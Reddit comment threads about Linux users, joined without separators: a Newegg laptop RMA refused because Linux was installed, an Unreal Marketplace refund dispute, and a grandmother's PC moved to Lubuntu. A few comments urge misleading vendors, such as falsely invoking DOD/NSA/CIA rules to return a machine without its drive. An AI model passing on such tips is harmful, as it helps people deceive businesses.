This is why I often shop on the Newegg site but actually order from Amazon if its available since I have Prime and Amazon could not care less what I return to them. I have just had one too many issues with Newegg's customer service, they are now a vendor of last resort.
I'd suggest sending this to the Linux Action Show guys.  They might just decide to leverage the LAS army on your behalf.
People are getting bent out of shape over nothing here.  The Laptop has a 1 year warranty from Lenovo, all the OP has to do is contact them and they will take care of it.

The only reason to RMA something to Newegg is if it is DOA out of the box, if it works and you use it, you should be dealing w/ the manufacture, even if it is w/ in the 30 day RMA window from Newegg.

Newegg's terms could be more clear sure, but they are not rejecting an RMA because of Linux, they are doing so because the item isn't stock and their terms w/ their supplier for returned items are what dictates that.

Newegg's problem here is they didn't say the OP should deal directly w/ Lenovo and that Lenovo will fix the problem. There's a clear break down in communication here.
I just sent a polite email to newegg feedback informing them that I won't be purchasing anything else from them until they make it clear that something like this won't happen again.  I gave a link to this thread and suggested they respond in the comments so others can see, so keep an eye on this thread.  If they respond by email alone, I'll post the response here.  I really hope they actually clear things up, because if they don't I'm going to have to start buying everything on amazon :(
Pull the hard drive, install Windows on a different system, replace drive, re-RMA.
I've got a $140k replacement budget this year. Stories like this make me think twice about ordering a single item from newegg. They've been popping up more and more recently and it makes me nervous. 
I usually swap out the hard drive to avoid this exact situation.
Did you get a warranty from Lenovo for the laptop when you bought it?  I assume you got at least 1 year automatically.  Just open a ticket with them.  I've sent in laptops with Linux partitions on them (and working OEM Windows ones) multiple times and never had a problem.  I usually take a moment to make Grub auto-boot into Windows with a very short delay just so the techs won't be confused, but in your case that could be difficult to manage.

Deal direct with Lenovo's warranty department.  
They don't give a shit as to what OS you install.

Also, you might want to repost this to /r/thinkpad
Just in case anyone wanted to contact NewEgg to voice your opinion: http://help.newegg.com/app/ask/site/US/category/74

I'd highly suggest that you do. I sent them an email under "Eggcellent Experiences". They are a business. You put pressure on them and they will be forced to change their policy.
This won't help you now, but in the future...

I always clone the factory disk with Clonezilla. If I decide to sell the laptop in the future, I'll re-image it and the new person can use whatever OS is installed, and if the computer blows up I'll remove the drive and re-image it before sending it back.

Also, thanks for this thread. I used to love NewEgg (this was back when everyone had desktops and built them from parts ordered online) and now I know to avoid them in the future.
The page at this link describes a situation 14 years ago, but perhaps it still somehow applies - it's how to get a check from the laptop manufacturer for the MS Windows installation when the first thing you do is load another OS on it:
http://b4.vu/g/toshiba.html
But it seems like this wouldn't legally jibe with burning an image to reload the drive if you have to return the machine.

It looks like Newegg "did the right thing" for the OP but ONLY because the story was on Consumerist and/or Slashdot and got the attention of a "Public Image Professional" at Newegg, and it doesn't appear that any policy or procedure has changed.
If at all possible, it'd be really awesome to get some more evidence in here. Not because I want to pick apart your story, but because I've used NewEgg for years and would really like to know if they're going downhill. 

Please follow up if at all possible, OP!
I wonder if they would have said the same thing if you installed the windows 8 beta on it. 
[deleted]
I sent a message expressing my disappointment and that I, nor my organization of 2500+ computers, will not be doing business with Newegg again.
I'd ask for an RMA and simply state "this device will not be shipped with harddisk, as it contains sensitive information. See applicable DOD, NSA, CIA, etc. regulations on the handling of sensitive government information."

That works every time for me.
newegg just lost my business.
Anyone know what the general consensus is on [The Consumerist](http://consumerist.com) these days? It's been a while since I read the site on the regular, but when I was reading it, getting stories posted on their front page was a good way to shame a company into taking action. You might try submitting it there.
Did you try going through the RMA process with Lenovo instead of Newegg?
Now that's what I call a "Shell Shocker".  I've bought tons from NewEgg myself for years.  This is most disheartening.
This is why the FIRST thing I do with any laptop or system we get in is boot TrueImage (or your similar utility of choice) and image the drive. Then if something goes utterly tits-up (such as massive user failure), I can restore the image to the drive - pulling the harddrive if needed and doing outside the box. Also is a wonderful thing when I resell the used systems - back to factory-original condition you go!
Forget newegg, contact lenovo direct, they WILL make it right. I had the same exact same thing happen to me with my w520. Lenovo sent me a brand new one.
Emailed Newegg customer support with this link and asked them to close my account. Have been a newegg customer for years, but they've been declining for a long time now. Their return policies suck ass in general, their shipping is slow and absurdly expensive, and..  on and on.

Hopefully this sends a message. A rough tally of my purchases at newegg is greater than 15k$.
Former IBM/Lenovo warranty tech here. Lenovo's have a pretty hassle free warranty system, providing the warranty certified shop in your area is somewhat competent. This was about 4 years back, but I almost always got parts in next day. They also pay out their contractors pretty quickly, so those jobs tended to get worked on almost immediately upon receiving parts. I would just go through them instead of jumping through any hoops from newegg. 
As an aside, i'm quite heartened at the number of comments from fellow redditors using linux as their default os.
I've been increasingly dissatisfied with Newegg recently. I've been trying to buy my stuff through amazon when possible. Neweggs RMA process leaves a lot to be desired. It took more than 2 weeks to get my motherboard replaced. I really wish they would cross ship RMAs
I just visited newegg and gave them a nice message about how messed up this is. I hope I receive a response.
Yeah I recently ordered a laptop and they lost it. It's taking me forever to get a refund. They wouldn't send another cause they suck.
Really I think you can have this problem with any company, its not always the company, but sometimes its just one or a handful of terrible employees. Or the person who hired the terrible people. 

Would at this point call up lenovo if you are sick of getting no where with NewEgg.
I was just about to buy the hardware for my next gaming rig from them, but not anymore. I also emailed them to tell them why they lost my business.
I used to buy stuff from Newegg (built my htpc and file server)

Not anymore. Amazon is cheaper, faster and no CA taxes.
If they do not help you here, I think I will stop telling my company from buying on newegg. We always buy from newegg but I did not expect this since I always get great help from them. I do not want to be in hot water with my company because I recommend a website and newegg pulling this on me.

thanks for informing everyone. Hope you get your issue resolved.
Can you clarify -- did NewEgg give you the RMA because their return policy was misapplied, or because they were getting bad publicity?
>The RMA was declined for a "modified/altered operating system." I spoke with a support agent, as well as a manager who couldn't comprehend the difference between an obvious hardware failure that could be found running the BIOS provided diagnostics, and the Linux installation. 

The OS can affect the longevity of the system. In fact, on Linux there is a fan-related Thinkpad bug that prevents the fan RPM from going above some threshold.

https://bugs.launchpad.net/ubuntu/+source/linux/+bug/751689

In a better world all of these issues would be addressed at the firmware level.
[deleted]
The product failed, you have a warranty with Lenovo, not Newegg. Have you tried Lenovo?
I bought a sata external hdd case. No where did it say what brands or types it could fit. 


Well I bought a drive and that case and for the life of me I could not get the drive to fit. 


Newegg told me because there is nothing wrong with the case and I bought a incompatible drive I had to pay shipping and a restocking fee. I complained a bunch and they got rid of the restocking fee. 


Newegg's RMA process sucks in my opinion. 
http://news.opensuse.org/2008/09/22/serious-e1000e-driver-issue-in-sle-11-beta-1-and-opensuse-111-beta-1/

Does no one remember stuff like this? Just because Linux works in general doesn't mean it's blameless for hardware flaws. I'm not surprised they refused to accept it, although I'm a little disappointed.
That's why I never send in my laptop with the hard disk in. I think Lenovo's customer service actually told me to do that the first time I called them because of a problem.
All of my linux boxes have a tendency to run red hot, so NewEgg may have a point. Does the device have some sort of EULA that says the machine can only run off the original Windows install? Because if it does, a) they may have you there as  matter of principle and contract, and b) there might be some limitation or defect in the device that they're hiding by disallowing unapproved OS. 
So put the original OS back on the drive. Still doesn't work then.
This is why I buy computers from Linux VAR's. My main box, is a Fortis Extreme from ZAReason. Those guys have amazing service and reasonable prices and they install your favorite distro and makes sure all components works with Linux.
I now only use Newegg for research and then buy the parts at a local shop. Local will always compete when you come in with a parts list. 

This happened because for some reason they insist on several forms of verification before they will even accept the same amex that is instantly accepted at every retailer I have ever try to buy something from. 

Buy local. You can take broken crap back instantly. 

Newegg has always been kind of hard-core with returns. I don't buy anything big money there anymore. They want to push anything they can onto the manufacturers. At least they are usually upfront about it. Buy from Amazon, or Microcenter if you have one local to you, whenever possible.
Vendors send their products back to the manufacturers when they are defective. Do you think Lenovo might give Newegg crap and not refund THEIR money because YOU modified it? Quite possibly.

It has a warranty on it. Contact Lenovo. Of course they could deny your warranty claim on the same grounds but you might have better luck.
Newegg is becoming Best Buy.

And you know what they say about Best Buy:

    You'd Best Buy from somewhere else.
if a company refuses to take back an obviously broken item(s), just take it up with your bank/credit card company, then they will wish they took it back. don't deal with bullshit guys.
Yuppers. Always restore the computer to how it was when sold to you, before you send it in under RMA. I've had to do that, a time or two.
This is why I buy everything from Amazon nowadays. Their customer service is top notch and they'll accept returns for pretty much everything without question (or fees).
One thing you have to take into account is their policy. I haven't looked at it. If their policy for obtaining RMAs says that changing the OS from what is supplied with the computer voids their RMA policy then they can decline you a repair. I'm not saying it's right or wrong of them. I'm just pointing out a possibility. 

I'm also not saying you shouldn't be allowed to change the OS. Of course you can. But Newegg does have the right to say what they are allowed to claim RMA on.

You do still have the ability to go direct to the MFG. When ever putting in a claim. Always return it back to stock if you can. 

Also they might have just replaced you laptop to which they would need to restore it and send it back to the MFG. It very well could be an agreement with the MFG that says it needs to be returned back with stock OS or something.

 If they are like Best Buy, they do not have restore discs laying around. Technically best buy SOP says the customer is always suppose to supply or purchase official disks. My managers said that we were not allowed to make copies of these discs to keep on hand for legal reasons. That supposedly came from the corporate office.
Newegg sucks!!!!  They lost me as a customer when they refused a return on a hard drive I bought that did not work, just clicked.  Said it was hardware damage and not covered.  It arrived in that condition!!!  I will never buy from them again.  Newegg sucks!!!
I contacted Newegg to see if OP is just a troll or not. I got a response back:

**Please kindly note that any modification to the item might void the item'=
s return policy with Newegg. For desktop and laptop, the OS system is bou=
nd with the specific serial number. If the OS is changed, we would not be=
 able to take it back for RMA.**

So basically I can't do any business with Newegg anymore.
This is a totally invalid reason to deny service.

If you had upgraded Windows, would they have the same complaint?

If you install a single program, like anti-virus, it's just as likely you've "modified the operating system" due to registry hooks.

NEWEGG:  I'm a Linux user that has bought several thousands of dollars worth of equipment from you (I'm willing to verify if you want to test me).  If you were to pull this crap with me I would take you to small claims court.  I will never buy from you or recommend you again unless you can post something in denial of the RMA declination the OP posted.
In case anyone was wondering, Newegg can block your account but they won't delete it out of their system.
This is why I never buy prebuilt computers from a shop (I'm talking about PC's, not laptops).  If I did buy a laptop, I'd make sure that shop supported having Linux installed on it.  At least one local shop does and they're great to deal with.
> the system had been modified

Because turning it on doesn't modify anything.

I had similar problems with NewEgg years ago.  I had to return a specific model of a laptop 4 times to get a working one (likely more the manufacturer's fault than there's obviously, but they sure didn't make the RMA processes easy on me).
What are the consumer laws like there? Here in Aus the burden of proof is on them to show that your change caused the fault, otherwise they have to honor it. 

But yeah, chargeback it
Ridiculous. Installing a new OS should be no different from installing a new web browser. 
I stopped using newegg after 12 years and over $20,000 spent due to reasons like this. Ever since they went to marketplace and stopped being a true electronics vendor, their customer service has gone in the toilet.
I will boycott NewEgg if you boycott HP. They done shit like this to me so many times. I've been smearing their name all over the internet ever since.

In fact, I need to find the typed up version of my story and post it here so  I can cost HP more money. I told them I would cost them $100,000 of business before I stopped spending my time on it.
Thanks for the post. Next time I want to buy something from Newegg I'll at least take a few minutes reflecting on my decision... then maybe check TigerDirect or somewhere else for a comparable price.
Most of the time when NewEgg fails to RMA something, the vendor will take care of it. most products come with a warranty of sorts.
Imagine being New egg waking up to a total PR disaster on Saturday morning. 
Noone has suggested it, and I would take the anecdotes with a grain of salt. Register a complaint with [the Better Business Bureau](https://www.bbb.org/). Some businesses actually want to keep a good reputation on BBB, and some don't. Newegg might resolve your issue if a complaint is registered.
Newegg's terms say nothing about modifying the OS, however, I suspect they would have rejected the RMA if you replaced Windows 7 Home w/ Windows 7 Ultimate. As others have said, just contact Lenovo direct, they will take care of it.
It looks like their return dept. is trying to improve their numbers at the expense of corporate image. Sadly your situation isn't a one off. They need to fix this quick or a great company,s hard earned reputation is going into the dumper. I love Newegg and they're the first stop in looking for parts. But there are competing business out there and maybe it's time I started looking at them. 
It sounds to me like their issue isn't so much that there's another OS on it but that the recovery partition was destroyed in the process. If I was setting up Linux on a laptop still in warranty I'd leave that partition intact for exactly this reason.
Hey InvertedFrog, I'm using a Lenovo Ideapad Z560. Its running Ubuntu 12.04 like a dream. I've bought from Newegg in the past but I never knew that they wouldn't honor an RMA request for such a stupid reason. As an IT guy who occasionally has a customer that needs a custom-made PC...I might just stop buying from them. It would be detrimental to my business. This is beyond stupid. As the other people in the thread mentioned, you would have better luck speaking to Lenovo directly. I hope you get everything straightened out.
To you Canucks out there, http://www.CanadaComputers.com has retail outlets in a lot of Canadian cities (they also offer shipping), is actually cheaper than Newegg or TigerDirect, and has an excellent part selection.
Not that newegg make it easy for govt to buy from them. But according to our regs, drives have to be wiped prior to leaving custody. ERGO, we would never be eligible for RMA.
Glad to see this is resolved (albeit in quite a messy fashion), and I think the message today just got a little bit louder: 

We are Linux. We are legion. Expect us.
I agree Newegg should refund/exchange due to  very clear hardware issues, but there's more to this. I was ready to cry bloody murder with the rest of the mob here, but I have to at least somewhat defend Newegg here: you made the computer to a point where it cannot reasonably be restored by deleting that OEM partition and presumably not burning the recovery media that it pesters you to make when you fire it up. 

I was a Geek Squad Agent for four years, and this recovery media is not something you screw around with. Sure, YOU/nonameshop/your father's brother's nephew's cousin's former roomate can use an OEM disc to get Windows 7 on there, but it does not contain the drivers and applications needed. Even if drivers can be downloaded from the OEM's site, there are often frivolous frontend programs (especially with Sony and HP) that aren't part of the standard driver downloads and can only be gotten from a stock OEM image. But when you're a large company, you can't just use an OEM disc on hand, you have to play by Microsoft's distribution rules and use ones from the OEM that made the machine, which you then have to order from the OEM for around $20 to resell it when you don't have a recovery partition. When computers are returned and there turns out to not be a hardware issue, they're sold open-box in a majority of places, including Newegg. Few things infuriated me more than people who threw a fit when they attempted this magical clean install nonsense, install Linux, or Hackintosh without burning the recovery discs that you are constantly prompted and pestered to burn, then their drivers don't work because they require frivolous fontends or other software not distributed through the OEM website, and then suddenly I'm the asshole when I tell them we're not allowed to retain those discs, and they have to order it from the OEM themselves. I believe that you have hardware issues. But there are so many schemers out there that fake issues or gut hardware (swap hard drives/RAM for lower quality or dead parts) that I'd do the same without witnessing it firsthand. 


tl;dr Burn your fucking recovery discs if you're going to nuke the partition. 
People who should be working aren't and people who shouldn't be working are.  No wonder ignorance has become standard and customer service an oxymoron. 
WHAT. THE. FUCK.
This sounds like less of a case of Newegg not being a fan of Linux, and more of a case of them not wanting to spend money.
And this even with a Thinkpad which usually are good combo with Linux. No Newegg for me until they fixes this.
Don't you modify the OS if you install something on it too? Or change the desktop background for that matter.
I would escalate this.  I don't think this is a Newegg company policy, and if it is it's ripe for change, especially with Windows 8 right around the corner.
There was a time when Newegg was amazing. Probably before they started gaining popularity amongst shithead consumers that break and return stuff.
I once had an HP rep try to void a printer warranty when I answered truthfully about what operating system my computer was running.  Thankfully, things have changed since 1998, but it sounds like Newegg might have someone with a stick lodged up their ass.
[deleted]
doesn't seem legit. talk to another customer service agent.

Look, I've been using Linux for years, but I can totally understand Newegg's position.  It really bothers me when folks state, "It's just an operating system, it can't break hardware."  An alternate OS absolutely can break hardware.  The simplest example is operation of the various fans in your computer.  The sensors and fan speeds are read and controlled by the OS, and if the OS doesn't properly support that hardware, it's very possible that you can overheat and permanently damage your hardware.  Of course, it's a slight possibility, but one that Newegg doesn't want to risk.

There are many companies that will sell you a laptop with Linux on it... go for one of those. 
They've lost this customer.  I'll spend the extra money and shop elsewhere as long as I know I won't have to deal with stuff like this.
I realize you're posting to /r/linux - but your headline is misleading bullshit.

It's not that NewEgg "isn't a fan of linux", it's that NewEgg "is using the fact that you've replaced your stock operating system" as an excuse not to fulfill your RMA.

Even if this is, in fact, crappy of them -- your headline is a pile of subreddit-pandering BS.

[here is the relevant section of their system return policy](http://www.newegg.com/HelpInfo/ReturnPolicy.aspx#37) by the way... 
I feel that Newegg grew too fast, and became too big. I've run into a lot of instances where I've ordered things from Newegg that arrive DOA, or are used when I was buying a new product.

In the end, I usually feel content to go buy things from the brick 'n' mortar Microcenter near my house, instead of dealing with Newegg. Sure, I've gotta pay taxes, but I find that people are less likely to refuse you when you are there in person. 
Your credit card company may have some kind of buyer protection for this very situation. Also, you are very likely still under the manufacturer's warranty period and can open a case with the manufacturer to get a replacement.
I'll probably avoid newegg from now on. I haven't bought too much stuff from them in the past. I use amazon a lot more.

I did buy some notebooks directly from lenovo. The first one had to be sent back twice. Had a bad screen and later a bad keyboard with 3 year warranty. Both times they wiped the OS back to windows and upgraded the BIOS but didn't seem to care about anyone running Linux. In fact they even have a web forum devoted to Linux. Seems like little "offical" support but I couldn't sense hostility. The dude on the phone said "Thats OK" when I said I had Linux on the box but maybe they don't care as much since it just goes to their own repair factory? Anyways, their handling of my hardware problems with laptop #1 caused laptop #2 and #3 to also be bought directly from lenovo since I was pretty satisfied. Sorry you had a crap experience though... makes me wonder if I chose the right laptop maker. Maybe they pressure newegg to do crap like that. Good luck.
I'm sorry to hear this. I've bought from Newegg before, but I guess I'll go elsewhere next time. Newegg is hardly original.
I don't believe it's very fair but if it voids the NewEgg warranty then I really don't think this is a huge issue.
So you just sent the computer back with Linux still installed on it? I don't really know why you did that. You should restored it yourself using the partition that you kept in place (why else would you keep it there if you were not going to use it for that reason?) and then sent it back. I get that they should help you either way and that (at least to me an most of us) it shouldn't matter that you install a new OS on the harddrive but why did you not use the partition you kept for (I would assume?) one of the main reasons you kept it?

Newegg has been pretty good in the past but I really don't know any company that deals well with the user changing things and then trying to RMA it.
I'm a TigerDirect man myself. But I do feel for you.
Did you actually run it with Windows at all any longer than five minutes? Some hardware just does this. It's something up with Linux, ACPI and all that fun stuff that causes shit to just break or die. I've seen it happen once, it's very rare.
I was actually about to order a new motherboard from them.

Not anymore.

Newegg, the only way that you get my business again is for you to RMA this guy's computer and make a $100 donation to the Linux Foundation.
I work in retail/tech support and I totally understand their behavior, it is not my job to restore the original os just to prove your right, just freakin restore it before shipping it back...
I'm going to be the Devil's advocate here.

Modified OS = voided warranty. 

That's not complicated, it doesn't matter if that isn't what caused the problem, you voided the warranty. That's with any tech gadget.
Newegg is great; why would you think you they would RMA a laptop after you've performed linux witchcraft on it.
http://cdn.memegenerator.net/instances/400x/21760924.jpg
Look at the terms of the warranty?
**UPDATE**

Epic Games has issued me a refund. No explanation was given. In my last correspondence with support they were firm about not providing a refund, so, I'm going to assume (possibly incorrectly) that perhaps someone read this post and acted accordingly. I'm going to assume (possibly incorrectly) that maybe someone here might have done something to help. Thank you.

To be clear, this wasn't really about the money. It was only $75. It was about the principle of the matter. I'm happy to forgive Epic Games and hopefully they can provide better support for Linux in the future. I hope everyone else will encourage them to do the same.

Thank you.

**UPDATE 2**

I just received this from support. I believe it is a reasonable response:


Hello, 

Since your request for a refund was made shortly after purchase, and it is obvious that there is no malicious intent, we have decided to go ahead and issue refunds for your purchase. After an internal discussion, we realized that it is not clear to Linux users that assets are not currently able to be downloaded directly to Linux. We are working on updating this to be more clear when users are browsing the Unreal Marketplace. We apologize for any inconvenience this has caused. 

Thanks, 
Unreal Engine Marketplace

**Original Post**

Here is my x-post in [/r/unrealengine](https://www.reddit.com/r/unrealengine/comments/a13hgi/for_linux_users_a_word_of_caution_unreal/)

TLDR;

I use Linux exclusively. I bought about $75 worth of assets from the Unreal Marketplace store. The assets were advertised as usable on Linux. However, there is no official way to download these assets using Linux.

Since I can't download these assets. I asked for a refund and Marketplace support refused my request.

I'd like to encourage Epic to support Linux by giving them my Linux dollars. But, not if they are being bad actors.

If you don't care, I'm Sorry to have wasted your time. But, if you are like me and hate companies that disrespect the Linux community, please visit the OP and read that.

Thank you.
[deleted]
There was a 3rd party tool that was created to allow Linux to download assets, if you decide to continue. 

https://forums.unrealengine.com/community/community-content-tools-and-tutorials/1436836-launcher-marketplace-downloader-for-Linux 

Myself, I ended up going back to Windows (needed for other things) and using Unity.
Card chargeback.
If you are from the EU you have the right to be refunded for your online purchases without a motive within the first 14 days after purchase. If you are you need to chech out the European Comission Consumer Protection website and you will find more infos on how you can file a complaint https://ec.europa.eu/info/live-work-travel-eu/consumers/resolve-your-consumer-complaint_en
> Since I can't download these assets. I asked for a refund and Marketplace support refused my request.

I haven't done anything in UE (Or any game engine, for that matter), is this simply because the only way to get them is via a windows/osx(?) client? 
[deleted]
Why would someone use Unreal since the bullshit they pulled with UT3?
Use Godot instead. FOSS, supports us first-class. Probably can download assets.
Just bought a Windows 10 FPP license to use in a VM for this, also for doing windows builds. I hate giving money to Microsoft but I want to be able to download the assets.

Also just to point out what has already been said, UE4 doesn't list Linux as a supported platform for the editor so personally I don't think its encumbant on Unreal to resolve this issue, if they did officially support Linux then I would expect this.
I don't know why they can't offer a download via browser. There even is a download button, but it only links to the launcher. 

I was however never under the impression that linux was a supported platform for the marketplace/client. The assets being compatible with deploying to linux (although I'm not sure why any asset wouldn't be, but I know that if there was no penguin people would ask in the comments if they could use it to develop for linux) or being used in the linux editor, for me are separate things. 

&#x200B;
I'm glad that this was an oversight that Epic is trying to correct rather than a purposeful slight to the Linux community.
Incompatible downloads, what a nonsense. It's not that downloads are so hard to be made cros-platform.
oh great, you got your money back. too bad they say they are working on making it clearer for linux users that you can not download the purchased assets. Instead i'd like to read that they are working on making this possible on linux.
[deleted]
Usable on Linux means that the assets will run on Linux. What you're complaining about is the method of delivery of those assets. You should be a bit more clear on that.

Why would you throw money at them without confirming you can download your assets? A five second search yielded this thread as the first result:

https://forums.unrealengine.com/unreal-engine/marketplace/1342433-downloading-marketplace-assets-on-linux

And this thread, right from the subreddit you posted in:

https://www.reddit.com/r/unrealengine/comments/5lqub5/unreal_asset_installation_linux/

I'll agree that it sucks there is no supported, official method for downloading purchased assets, but had you spent five minutes verifiying you could in fact get these assets, you wouldn't be out $75 (which in and of itself sucks).
[deleted]
[deleted]
[removed]
My grandma (77), had recently been frustrated with how slow her computer had become. It was an old HP Pavilion with a dual core Athlon and 4GB of DDR2 RAM. It had come with windows 7 preinstalled on an old, slow Seagate 3.5 inch drive. I had recently gotten Lubuntu installed on an old laptop of mine, and it ran great. So I figured maybe I could buy her an SSD and install Lubuntu for her so she would be able to use her computer like it was new again. My grandpa and I went to Best Buy and got a 240 gig PNY SATA 3 SSD for $38. After returning home, I got the Lubuntu ISO downloaded and burned the image to my USB. Upon entering the boot menu, I realized my fate. Her computer did not have the capability to boot from USB. Long story short, over the course of 2 days I found an old DVD-RW disc and burned the image. Installation was hasty on the new drive and easy to configure everything. After installation, I got her wireless printer configured and got chrome installed, along with making some desktop entries for Facebook, her email, etc. I plugged a USB drive in and booted off the HDD to copy all her pictures onto the flash drive (2GB, lol). After all I got all her precious data moved over and she loves it. The fast boot times, snappiness and overall system responsiveness is a big plus to her when she just wants to send an email or check Facebook.
You are a real goat. I can't even teach my parents how to use Linux.
Just one more 7 and she can read, write, and execute.
I can't even teach my parents how to use a computer, so they ignore what is an OS.
I converted several older people to Linux in my life, and it’s funny how once they get over the “change is scary” thing, Linux is PERFECT for people who just want to browse Facebook/Pinterest, save recipes, make simple documents, etc. 

It requires basically no upkeep, is much more secure than windows, and obviously is very performant. My mom actually basically whines now because she misses Linux Mint (really she misses Cinnamon, it could be anything running under it, she just got used to Cinnamon DE because it’s polished and windows-y). My dad basically strongarmed me into making their computers windows again for his gov job to use word and shit and I was like “okay, but if you go back to Windows, you can deal with your own problems.”

... rambling aside, point is, nice going :)
That's great to hear! I am amazed by how our elder people seem to be much eager to accept Linux over Windows than our parents or even people at our age group. 

That's lovely, it shows how their mindset of 'if it doesn't work, it should be repaired' stays stronger than the one of 'if it doesn't work, buy another', which sometimes is one of Linux's greatest allies.
Nice!  Btw if you run into this issue again you can generally just connect the drive to a system that can boot from a usb, install the OS onto the drive, and then just put the drive back in the target system.
Good on you dude. Well done! Spread the word one person at a time.
My grandma also uses Linux for the past 5 years. After distrohopping she settled with cloudready. I use arch btw.
You're the Man! :)
I installed lubuntu on my dad's old windows 98 carrying 386.  Literally all he did on it was check email, check Facebook, play mahjong, and play some Yahoo solitaire game with some online buddies.  That was years ago, and he suffers from dementia as well and can't manage a computer anymore, but he STILL sends and receives postcards from his Yahoo group gaming buddies.
Well done! Any backup strategy implemented too?
I did this for my grandma too, and I think more people should do this for their grandparents. There's not really anything to "teach" if you set it up nicely for them. 

Use something like Linux Mint, enable automatic updates, create .desktop shortcuts for the things they do, and put them on the desktop. Adjust font and icon sizes if needed. All they have to remember is to double click on the thing they want to do. My grandma comes to me with problems less often now than she did with Windows 7.
Why you installed Lubuntu? Don't you know Arch is the most noob friendly?
Wow, didnt realize how far/fast SSD prices have come down.  I did upgrade/update a few +10 year old Lenovo/Dell PC's sitting around to 18.04 Ubuntu but their HDD's made them run ok.

Worth it to upgrade for less than $50 to a decent SSD as they will be used mainly for surfing and VLC Video files.
Job done! You did your part!
Fine. Now warn her to be very careful with the 'dd' - command.
Now replace Chrome with Firefox and it will be even faster!
Thats awesome : )
> Her computer did not have the capability to boot from USB.

sometimes you can cut that corner by booting over network, if it's possible
Great job man! Keep it up!!
Grandma 77, Facebook, Linux... Man, that's pretty awesome :D
I love it when the oder people are willing to use all the modern computer stuff and embrace the possibilities.
[deleted]
i did teach my parents linux as i got so tired of formating their computers every 2 years as it got slower and slower as the time passes and gets more viruses (also always assuming those computers were absolutely not reliable for introducing confidential data as you were sure it was so deeply infected, didnt make things better).

Best idea i ever had related to it. Was the beggining all complains? Yes, as any stubborn person who doesn't want any change in his life, he will complain. Just hang in there for a few months and it will reach a point of only a few complains of "how do i do this" vs the bless of no more real problems, which at that point it makes it worth it, but if you wait a few more months it will reach the point of "i want a new laptop, install linux in it i don't want to use windows", which may be the most tech pleasant phrase you could hear

i just wanna say: if you use a computer for office/web/multimedia, there is no point in using windows anymore. At all. Just as an advice for all of you who maintain elderly people's computers. Just install something like kubuntu and stay there for the questions about how it works
Awesome stuff!  I've temporarily converted a few people this way.  New computers ruin it! (for good enough reason I suppose)

This is probably getting to be a pretty rare concern, that you found a computer that cannot boot from USB, but JUST IN CASE it comes up again... I'd keep a copy of [PLoP](https://www.plop.at/en/bootmanager/download.html) around.  You boot that from CD, and it turn will let you load bootable USB drives.
Remember to configure unattended upgrades for her.
This is a great idea, especially for the not so Internet savvy. I actually did this for my nan as she ALWAYS kept getting malware installed. She even got cryptowared. Knowing she only browsed the web and wrote letters, I put on LMDE for her and told her it was an update. Can remotely manage her system and not once has she managed to get any nasties.
I set up my dad and Grandmother with Ubuntu 18.04 and neither of them needed introduction or help beyond "click here to go to your games, click here to go to the internet". I think my grandmother is also 77. TBH Ubuntu and Elementary are just that nice and easy.
Pro-tip: In instances like these, you can write the installer directly to the SATA drive, then boot with the `toram` option on the Kernel command line (before the `---`).
My hero! Before definitely moving to a different country, in order to same my time and eliminate the need to fix bugs remotely, I installed Linux Mint on my mother’s and father’s PCs, and left Windows 7 as a second OS that quickly flashes in the GRUB loader for a couple of seconds. My father is using Linux 95% of the time, but sometimes, when he just needs to open that one old buggy site or one report with broken mark-up, he temporarily switches to Windows. Never reinstalled or had to repair their system in 6 years.
I resuscitated a lot of really old crappy computers this way while I was doing this kind of work in high school (a long time ago). When grandma only uses the computer for yahoo mail, that makes it pretty easy. I'm sure these computers were pretty good when new, but "Windows rot" is real.
That kind of stuff is great! I had my grandmother use Lubuntu a few years back on an old Dell Inspiron from 2003 until she dropped her computer, causing it to break. It ran like a champ after getting broadcom drivers to play nice with `dkms` so that she'd still have wifi on updates.

Not wanting to be bothered with MIS, I had later gotten her a Chromebook. So I am still happy to say she is a Linux user.
I recommend you to use plop boot manager, you can burn the iso in a cdrom and then you can run a live USB through this boot menu
Great!! 

I moved my aunt & MIL to Linux last summer. Both Debian Stable. Aunt had an old Mac, but LXQt + Kvantum + Openbox can do an ok fake Catalina with Thunar. MIL got a Win 7 feel via Budgie, 

Both are happy. When we visit I run the updates & that's the only maintenance. Really recommend the Linux switch for those in the classic "grandma"use case & who live on a fixed income.
4GB of DDR2? Seems like a weird capacity for that standard. Are you sure it wasn't DDR3?
Much of my family has used desktop linuxes. Years ago I said I don't do tech support on windows (sure, I can, I just won't). My mom was on linux like 20 years ago. Nowadays though I get them chromebooks.
This is the computer model I'm using... I'm guessing it's an HP Pavilion DV7 1247CL....
Did you decide on Lubuntu just because it's lightweight? Also did you tweak the desktop for her in anyway or did you leave it relatively stock?
How in the world even?
Great story, I recently gave my mom (76) my beloved Lenovo X230 with Ubuntu 20.04 installed, so we could keep in touch easier and more frequently, she could message, mail and video call with her grandchildren. She liked the idea because of the lockdown and all, but then we quickly realized she had never used a keyboard or mouse before, and this became an issue, she is left-handed too. The keyboard she got rather quickly, the mouse she just couldn't get used to. She never actually used it, she just said I'll stick to the phone.
You should go back and set up remote desktop access for when she has issues!
I'd probably do the same with my father if he wouldn't be completely dependent on Microsoft Word and Adobe Photoshop. I was unable to convince him to use alternatives, which are sufficient to do what he is doing!
Nice job!  


Next step, set up backups for their data (local and remote).
I'm more impressed you got the printer working so easily.
I had my grandpa on xubuntu on his super old p2 for a long time until someone gave him an XP machine.. never really had any problems until XP.
A Legend
Good to hear! I had my mom using Xubuntu for a few years around 2007/2008 as well and she had no trouble with it. It's a lot easier to cut out the excess on a *nix install than on a Win machine IMO.
<3 Lubuntu
Great story, thanks for sharing.

There's always that chance that this will be the computer she uses for the next 20 years.
My uncle bought my grandparents an Intel nuc and installed mint on it. They love it. They never update it though so I make sure to do that when I drop by.
My grandpa still uses the AOl browser so I doubt I could convince him to move to Linux

Also he's happy with Windows, so I don't really want or need to.
I got my mother (now 84) a MacBook and since I had to support it, Firefox and Thunderbird.  When it finally got too far out of date, I put Ubuntu on it.  There was not a big learning curve other than figuring out how to start the apps.  This is going on 10 years on Ubuntu and 15 with Firefox and Thunderbird.  When this MacBook finally dies, will move to a Chromebook and install Firefox and Thunderbird (or reload the OS so I can).
Sometime I might see if my grandma would like to give it a try. She's a retired programmer and still remembers how to do a lot of windows and stuff so I think she would do perfectly fine
I booted Ubuntu onto a computer and gave it to grandpa, but all he wants to do is play cards basically. It was Gnome but I put cinnamon as the desktop. It looks very similar to the old Windows XP( I think) that they had at that house.

Convinced my mom to switch to Linux some ten years ago, she's been running mint for that time and loves it, for her work she only needs web browsing, a lot of (very basic) documents and  the occasional spreadsheet. Never had any problems so far. And now she only wants to have Linux on any laptop she gets.
